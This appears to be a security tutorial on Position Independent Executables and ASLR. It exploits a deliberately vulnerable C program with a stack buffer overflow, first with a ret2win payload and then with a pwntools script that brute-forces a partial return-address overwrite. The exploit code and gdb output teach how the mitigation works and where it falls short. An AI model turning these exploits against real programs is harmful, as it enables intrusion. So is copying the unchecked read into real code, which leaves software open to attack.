Position Independent Code (PIC) is code that can be loaded at any memory address without modification. Shared libraries are typically compiled as PIC so that the loader can place them at whatever base address is available.
This has a couple of benefits. First, address space collisions don’t occur, i.e. two shared libraries never need to occupy overlapping regions of virtual address space. Second, PIC can benefit from Address Space Layout Randomisation (ASLR), which makes Return-Oriented Programming (ROP) attacks harder to carry out.
A Position Independent Executable (PIE) is a standard executable file (rather than a shared library) that can be loaded at any memory address without modification. It is just another form of position independent code.
To demonstrate the effect of PIE on an executable, let’s start with a ret2win challenge. The code is susceptible to a trivial buffer overflow vulnerability: check_password reads up to 100 bytes into a 32-byte buffer. Our objective is to call the auth_success function by overwriting the check_password function’s return address.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void auth_failure()
{
    puts("Authentication failed");
}
void auth_success()
{
    puts("Authentication succeeded");
}
void check_password() {
    char password[32];
    unsigned long size = 100;
    puts("Password:");
    read(0, &password, (unsigned long) size);
    if(strcmp(password, "SuperSecret\n") == 0) {
        auth_success();
    }
    else {
        auth_failure();
    }
}
int main(int argc, char **argv) {
    check_password();
    return 0;
}
Compile the code without PIE using the following command.
gcc vulnerable.c -o vuln -fno-stack-protector -no-pie
Executing the program using gdb, we can see the auth_success function has the address 0x40115c.
(gdb) disassemble check_password
Dump of assembler code for function check_password:
0x0000000000401172 <+0>: push %rbp
0x0000000000401173 <+1>: mov %rsp,%rbp
0x0000000000401176 <+4>: sub $0x30,%rsp
0x000000000040117a <+8>: movq $0x64,-0x8(%rbp)
0x0000000000401182 <+16>: lea 0xeaa(%rip),%rax # 0x402033
0x0000000000401189 <+23>: mov %rax,%rdi
0x000000000040118c <+26>: call 0x401030 <puts@plt>
0x0000000000401191 <+31>: mov -0x8(%rbp),%rdx
0x0000000000401195 <+35>: lea -0x30(%rbp),%rax
0x0000000000401199 <+39>: mov %rax,%rsi
0x000000000040119c <+42>: mov $0x0,%edi
0x00000000004011a1 <+47>: call 0x401040 <read@plt>
0x00000000004011a6 <+52>: lea -0x30(%rbp),%rax
0x00000000004011aa <+56>: lea 0xe8c(%rip),%rdx # 0x40203d
0x00000000004011b1 <+63>: mov %rdx,%rsi
0x00000000004011b4 <+66>: mov %rax,%rdi
0x00000000004011b7 <+69>: call 0x401050 <strcmp@plt>
0x00000000004011bc <+74>: test %eax,%eax
0x00000000004011be <+76>: jne 0x4011cc <check_password+90>
0x00000000004011c0 <+78>: mov $0x0,%eax
0x00000000004011c5 <+83>: call 0x40115c <auth_success>
0x00000000004011ca <+88>: jmp 0x4011d6 <check_password+100>
0x00000000004011cc <+90>: mov $0x0,%eax
0x00000000004011d1 <+95>: call 0x401146 <auth_failure>
0x00000000004011d6 <+100>: nop
0x00000000004011d7 <+101>: leave
0x00000000004011d8 <+102>: ret
Restarting the program several times, we can see the address is always 0x40115c.
(gdb) p auth_success
$3 = {<text variable, no debug info>} 0x40115c <auth_success>
Since our code is vulnerable to a buffer overflow, we can overwrite the return address with a value of our choosing, such as the auth_success function address.
binary_data = b''
binary_data += b'A'*56  # 0x30 bytes from the buffer up to rbp, plus 8 bytes of saved rbp
binary_data += b"\x5c\x11\x40"  # 0x40115c, least significant byte first
with open('output.bin', 'wb') as f:
    f.write(binary_data)
print("Binary data written to 'output.bin'")
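The 56 bytes of padding follow from the disassembly above: read() writes to -0x30(%rbp), and the saved frame pointer sits between that location and the return address. The sketch below is only an illustration of that arithmetic; the constant names are made up for this example.

```python
import struct

BUFFER_OFFSET_FROM_RBP = 0x30  # from `lea -0x30(%rbp),%rax` before the read() call
SAVED_RBP_SIZE = 8             # saved frame pointer between the buffer and the return address
AUTH_SUCCESS = 0x40115c        # address gdb reported for the non-PIE build

padding_len = BUFFER_OFFSET_FROM_RBP + SAVED_RBP_SIZE

# Pack the address as a little-endian 64-bit value and keep the three
# low-order bytes. The original return address points into main at
# 0x4011xx, so its upper five bytes are already zero.
target = struct.pack("<Q", AUTH_SUCCESS)[:3]
payload = b"A" * padding_len + target

print(padding_len)
print(target)
```

Writing only three bytes works here because the upper bytes of the saved return address are already the ones we want.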
Running the code, we can see that authentication initially fails because the string we entered does not match the required value, but auth_success is then executed when check_password returns.
┌──(kali㉿kali)-[~]
└─$ python3 exploit.py
Binary data written to 'output.bin'
┌──(kali㉿kali)-[~]
└─$ cat output.bin| ./vuln
Password:
Authentication failed
Authentication succeeded
Enabling PIE
Let’s recompile our code, but this time enable PIE.
gcc vulnerable.c -o vuln -fno-stack-protector -fPIE -pie
We can use checksec to verify that PIE is enabled on this executable.
checksec --file=./vuln
RELRO          STACK CANARY     NX          PIE          RPATH     RUNPATH     Symbols     FORTIFY  Fortified  Fortifiable  FILE
Partial RELRO  No canary found  NX enabled  PIE enabled  No RPATH  No RUNPATH  41 Symbols  No       0          1            ./vuln
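As a rough cross-check of what checksec reports, the ELF header's e_type field can be read directly. This is a minimal sketch and not how checksec itself works: ET_DYN is also the type used by shared libraries, so it only distinguishes a PIE build from a fixed-address (ET_EXEC) build. The function names are hypothetical.

```python
import struct

ET_EXEC = 2  # fixed-address executable (what -no-pie produces)
ET_DYN = 3   # shared object; also used for PIE executables


def elf_type(header: bytes) -> int:
    """Return the e_type field from the first 18 bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[EI_DATA] (byte 5): 1 = little endian, 2 = big endian
    endian = "<" if header[5] == 1 else ">"
    # e_type is a 16-bit field directly after the 16-byte e_ident array
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return e_type


def looks_like_pie(path: str) -> bool:
    """Heuristic only: True when the file's e_type is ET_DYN."""
    with open(path, "rb") as f:
        return elf_type(f.read(18)) == ET_DYN
```

Calling looks_like_pie("./vuln") should return True for the build above and False for the earlier -no-pie build.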
Running the application in gdb, we can see that the address of auth_success has changed, but it stays the same each time the application is restarted.
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55555555516f <auth_success>
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55555555516f <auth_success>
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55555555516f <auth_success>
This is because gdb disables ASLR in debugging sessions by default. We can re-enable it using:
(gdb) set disable-randomization off
(gdb) show disable-randomization
Disabling randomization of debuggee's virtual address space is off.
We can now see the PIE executable addresses are being randomised by ASLR.
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55570fa1a16f <auth_success>
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x564ea188a16f <auth_success>
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55fad605116f <auth_success>
However, we can observe that the lowest 12 bits of the address (0x16f) stay the same. Little-endian CPUs, including Intel x64 systems, store the least significant byte of a value first in memory. As such, if we only partially overwrite the saved return address (the value that ret loads into RIP), our bytes replace its least significant bytes and the randomised upper bytes are left as they are.
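To make the byte ordering concrete, the sketch below simulates a two-byte overwrite of a stored 64-bit pointer. The saved return addresses are hypothetical values chosen to share their upper bytes with two of the auth_success addresses observed above; partial_overwrite is an illustrative helper, not part of any library.

```python
import struct


def partial_overwrite(original: int, low_bytes: bytes) -> int:
    """Simulate overwriting the first len(low_bytes) bytes of a stored 64-bit pointer."""
    stored = bytearray(struct.pack("<Q", original))  # in memory: least significant byte first
    stored[:len(low_bytes)] = low_bytes
    return struct.unpack("<Q", bytes(stored))[0]


# Hypothetical saved return addresses for two differently randomised runs.
lucky_run = 0x55fad6051234    # random nibble happens to be 0x1
unlucky_run = 0x55570fa1a234  # random nibble is 0xa

print(hex(partial_overwrite(lucky_run, b"\x6f\x11")))
print(hex(partial_overwrite(unlucky_run, b"\x6f\x11")))
```

In the first case the result equals the observed auth_success address 0x55fad605116f. In the second it becomes 0x55570fa1116f rather than 0x55570fa1a16f, so the process would most likely crash.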
Because we can only write whole bytes, a two-byte overwrite also sets the nibble preceding 0x16f, which is still randomised. We can simply set it to 0x1 and attempt authentication multiple times; each attempt has roughly a 1 in 16 chance of matching. This is demonstrated in the code below, where we perform a partial pointer overwrite attack.
#!/usr/bin/env python3
from pwn import *

binary_data = b''
binary_data += b'A'*56
binary_data += b"\x6f\x11"  # low two bytes of auth_success, guessing 0x1 for the random nibble

elf = ELF('./vuln')  # not needed by the exploit itself; prints the checksec summary
for x in range(50):
    try:
        p = process("./vuln")
        p.recvuntil(b'Password:\n')
        p.send(binary_data)
        p.recvline()  # "Authentication failed"
        response = p.recvline()
        if b"succeeded" in response:
            print("SUCCESS")
            print(response)
            break
    except EOFError:
        # Wrong guess: the process died before printing a second line
        pass
Running it shows that, in this instance, it took 4 attempts before the guessed address was correct.
python3 pie_exploit.py
[*] '/home/kali/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
[+] Starting local process './vuln': pid 4162
[+] Starting local process './vuln': pid 4164
[+] Starting local process './vuln': pid 4166
[+] Starting local process './vuln': pid 4168
SUCCESS
b'Authentication succeeded\n'
[*] Stopped process './vuln' (pid 4168)
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 4166)
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 4164)
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 4162)
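How many attempts to expect can be estimated with a little arithmetic. The sketch below assumes the four unknown bits are chosen uniformly and independently on every run, which is a simplification; success_probability is a hypothetical helper name.

```python
def success_probability(attempts: int, random_bits: int = 4) -> float:
    """Chance that at least one of `attempts` independent guesses hits the right value."""
    per_try = 1 / (2 ** random_bits)
    return 1 - (1 - per_try) ** attempts


for n in (1, 4, 16, 50):
    print(n, round(success_probability(n), 3))
```

Under that assumption a single guess succeeds one time in sixteen, and a budget of 50 attempts, as used in the loop above, succeeds in the large majority of runs.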
If partially overwriting the return address in this manner isn’t viable, you would need a way of leaking a valid code address from the running process via another vulnerability, such as a format string bug, so that the executable’s base address can be calculated.
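Once a code pointer has been leaked, recovering the full address of auth_success is simple subtraction and addition. The following is a sketch under stated assumptions: the offset 0x116f comes from the gdb session with ASLR disabled (0x55555555516f minus the base 0x555555554000), while the leaked pointer and its offset of 0x1200 are hypothetical values invented for illustration.

```python
AUTH_SUCCESS_OFFSET = 0x116f  # 0x55555555516f - 0x555555554000, from gdb with ASLR disabled
LEAKED_OFFSET = 0x1200        # hypothetical: offset of whatever code pointer was leaked


def pie_base(leaked_addr: int, leaked_offset: int) -> int:
    """Recover the load base from a leaked address whose file offset is known."""
    base = leaked_addr - leaked_offset
    if base & 0xfff:
        raise ValueError("computed base is not page aligned; wrong offset?")
    return base


leaked = 0x564ea188a200  # hypothetical leaked pointer from a randomised run
base = pie_base(leaked, LEAKED_OFFSET)
auth_success = base + AUTH_SUCCESS_OFFSET
print(hex(base), hex(auth_success))
```

The page-alignment check is a cheap sanity test: a base that is not a multiple of 0x1000 usually means the assumed offset is wrong.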
Why are the addresses not fully randomised?
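The base address of a PIE executable will always end in 0x000, since it must be aligned to a page boundary. By default, the page size is 0x1000 bytes (4096 in decimal), so the lowest 12 bits of the base are zero and the lowest 12 bits of every function’s address are fixed by its offset within the file. The getconf command will show the page size on your system.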
getconf PAGESIZE
4096
The info proc mappings command in gdb will also confirm this behavior.
(gdb) info proc mappings
process 26826
Mapped address spaces:
    Start Addr        End Addr          Size      Offset    Perms  objfile
    0x555555554000    0x555555555000    0x1000    0x0       r--p   /home/kali/vuln
    0x555555555000    0x555555556000    0x1000    0x1000    r-xp   /home/kali/vuln
    0x555555556000    0x555555557000    0x1000    0x2000    r--p   /home/kali/vuln
    0x555555557000    0x555555558000    0x1000    0x2000    r--p   /home/kali/vuln
    0x555555558000    0x555555559000    0x1000    0x3000    rw-p   /home/kali/vuln
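The same property can be checked against the randomised addresses gdb printed earlier by splitting each one into its page start and its offset within the page. This is a small sketch; PAGE_SIZE is hard-coded to the value getconf reported rather than queried from the system, and split_address is an illustrative helper.

```python
PAGE_SIZE = 0x1000  # value reported by `getconf PAGESIZE` above

# auth_success addresses observed in gdb with randomisation enabled
observed = [0x55570fa1a16f, 0x564ea188a16f, 0x55fad605116f]


def split_address(addr: int, page_size: int = PAGE_SIZE) -> tuple[int, int]:
    """Return (start of containing page, offset within that page)."""
    offset = addr & (page_size - 1)
    return addr - offset, offset


for addr in observed:
    page_start, offset = split_address(addr)
    print(hex(page_start), hex(offset))
```

Every address yields the same in-page offset of 0x16f; only the page start changes between runs.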
In Conclusion
PIE does have a performance impact, although on x86-64 this is fairly negligible because the architecture supports RIP-relative addressing. As such, a number of Linux distributions now enable it by default.
The main benefit of PIE is that it allows Address Space Layout Randomisation (ASLR) to cover the executable itself, which makes known memory vulnerabilities harder to exploit. With the memory layout randomised, attackers can’t easily predict where functions, buffers, or other data reside, although, as shown above, a partial overwrite or an address leak can still defeat it.